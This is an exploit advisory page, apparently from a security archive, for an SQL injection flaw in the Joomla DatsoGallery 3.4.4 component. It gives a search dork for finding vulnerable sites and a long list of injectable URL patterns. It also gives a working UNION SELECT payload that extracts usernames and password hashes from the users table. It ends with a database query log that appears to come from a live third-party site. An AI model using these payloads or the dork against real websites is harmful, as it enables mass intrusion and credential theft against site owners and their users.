what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla DatsoGallery 3.4.4 SQL Injection

Joomla DatsoGallery 3.4.4 SQL Injection
Posted Feb 14, 2019
Authored by KingSkrupellos

Joomla DatsoGallery component version 3.4.4 suffers from remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 4472144c070626909efd2a7ec58539b6b88ccc30de6678113f7464db2f890b52

Joomla DatsoGallery 3.4.4 SQL Injection

Change Mirror Download
####################################################################

# Exploit Title : Joomla DatsoGallery Components 3.4.4 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : datso.fr
# Software Download Link : datso.fr/products.html
# Software Information Link : extensions.joomla.org/extension/datsogallery/
# Software Affected Versions : 3.4.4 and previous versions
1.3.6.1 - 1.3.8 ~ 1.5 ~ 1.14 ~ 1.6 ~ 1.6.2 - 1.7.1 - 1.20 - 1.8.8 - 1.8.4 - 1.8.9 - 1.9.5
# Software Prices : 20$ - 60$ - 120$ - 240$
# Software Technical Requirements :
DatsoGallery Multilingual is a native Joomla! and Mambo 4.6.x gallery component
DatsoGallery Multilingual is a native Joomla! and Mambo [ No Version ] gallery component
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : inurl:''/index.php?option=com_datsogallery''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Old Similar CVE => CVE-2008-1540 => nvd.nist.gov/vuln/detail/CVE-2008-1540
# Old Similar CVE => CVE-2008-5208 => cvedetails.com/cve/CVE-2008-5208/
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
DatsoGallery component help you quickly and effortlessly create a multi-functional

photo gallery. The intuitive interface makes it easy to manage the component and its content.

A lot of settings allows you to organize the gallery, meet within acceptable to your requirements.

It's a powerful image gallery component, which help you quickly and effortlessly

create a beautiful and multi-functional photo gallery on your web site.

####################################################################

# Impact :
***********
Joomla DatsoGallery 3.4.4 and other versions -

component for Joomla is prone to an SQL-injection vulnerability because it

fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,

access or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_datsogallery&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&func=detail&id=[SQL Injection]

/index.php?option=com_datsogallery&func=wmark&oid=[SQL Injection]

/index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]

/index.php?option=com_datsogallery&task=image&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&func=detail&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&task=sbox&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw

/index.php?option=com_datsogallery&func=slideshow&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw

/index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]

/index.php?option=com_datsogallery&func=download&id=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&task=downloads&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]

/index.php?option=com_datsogallery&func=lastadded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]

/index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]

/index.php?option=com_datsogallery&Itemid=[SQL Injection]&func=special&sorting=lastcomment

/index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&catid=[ID-NUMBER]&id=[SQL Injection]&lang=hu

# Information Disclosure Exploit :
*****************************
/administrator/components/com_datsogallery/datsogallery.xml

# Example SQL Injection Payload :
*******************************

'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*

####################################################################

# Example SQL Database Errors :
****************************
30 queries executed
1
SET sql_mode = 'MYSQL40'
2
SELECT folder, element, published, params
FROM jos_mambots
WHERE published >= 1
AND access <= 0
AND folder = 'system'
ORDER BY ordering
3
SELECT template
FROM jos_templates_menu
WHERE client_id = 0
AND ( menuid = 0 OR menuid = 99999999 )
ORDER BY menuid DESC
LIMIT 1
4
DELETE FROM jos_session
WHERE (
( time < '1550015982' )
AND guest = 0
AND gid > 0
) OR (
( time < '1550015982' )
AND guest = 1
AND userid = 0
)
5
SELECT *
FROM jos_menu
WHERE published = 1 AND
link LIKE 'index.php?option=com\_datsogallery%'
6
select a.*, cc.name as category from jos_datsogallery as a, jos_datsogallery_catg as cc
where a.catid=cc.cid and a.id=2219 and cc.access<='0'
7
select * from jos_datsogallery_catg where cid=141 and published=1 and access<='0'
8
select * from jos_datsogallery_catg where cid=3 and published=1 and access<='0'
9
select c.access from jos_datsogallery_catg as c left join jos_datsogallery as a on a.catid=c.cid where a.id= '2219'
10
select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum, a.published,
a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a left join jos_users
as u on u.username=a.owner where a.id='2219' and a.approved=1
11
select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum,
a.published, a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a
left join jos_users as u on u.username=a.owner where a.id='2219' and a.approved=1
12
SELECT id, imgfilename FROM jos_datsogallery WHERE catid=141 ORDER BY id DESC
13
UPDATE jos_datsogallery SET imgcounter='286' WHERE id=2219
14
SELECT a.*
FROM jos_components AS a
WHERE ( a.admin_menu_link = 'option=com_syndicate' OR a.admin_menu_link =
'option=com_syndicate&hidemainmenu=1' )
AND a.option = 'com_syndicate'
15
SELECT id, title, module, position, content, showtitle, params
FROM jos_modules AS m
INNER JOIN jos_modules_menu AS mm ON mm.moduleid = m.id
WHERE m.published = 1
AND m.access <= 0
AND m.client_id != 1
AND ( mm.menuid = 0 )
ORDER BY ordering
16
SELECT m.*
FROM jos_menu AS m
WHERE menutype = 'topmenu'
AND published = 1
AND access <= 0
AND parent = 0
ORDER BY ordering
17
SELECT m.*
FROM jos_menu AS m
WHERE menutype = 'mainmenu'
AND published = 1
AND access <= 0
ORDER BY parent, ordering
18
SELECT COUNT( id )
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
19
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=1'
20
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=13'
21
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=12'
22
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=14'
23
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=15'
24
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=16'
25
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=17'
26
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=18'
27
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=23'
28
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=38'
29
SELECT id
FROM jos_menu
WHERE type = 'content_item_link'
AND published = 1
AND link = 'index.php?option=com_content&task=view&id=46'
30
SELECT id, name, link, parent, type, menutype, access
FROM jos_menu
WHERE published = 1
AND access <= 0
ORDER BY menutype, parent, ordering

Strict Standards: Non-static method JSite::getMenu() should not be called
statically in /home/abusheik/public_html/ds/components
/com_datsogallery/datsogallery.php on line 20

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close